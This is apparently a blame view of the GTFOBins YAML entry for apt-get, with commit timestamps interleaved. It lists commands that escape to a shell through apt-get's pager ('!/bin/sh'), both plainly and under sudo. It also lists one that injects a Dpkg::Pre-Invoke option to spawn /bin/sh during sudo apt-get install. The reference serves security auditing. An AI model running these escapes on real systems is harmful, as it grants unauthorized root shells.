2018-08-31 11:09:19 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-10-05 19:55:38 +02:00
|
|
|
shell:
|
2018-11-29 12:27:41 +01:00
|
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
|
|
code: |
|
2018-08-31 11:09:19 +02:00
|
|
|
apt-get changelog apt
|
|
|
|
!/bin/sh
|
2018-10-05 19:55:38 +02:00
|
|
|
sudo:
|
2018-11-29 12:27:41 +01:00
|
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
|
|
code: |
|
2018-08-31 11:09:19 +02:00
|
|
|
sudo apt-get changelog apt
|
|
|
|
!/bin/sh
|
2018-11-29 14:25:49 +01:00
|
|
|
- description: For this to work the target package (e.g., `sl`) must not be installed.
|
|
|
|
code: sudo apt-get install -c <(echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}') sl
|
2018-08-31 11:09:19 +02:00
|
|
|
---
|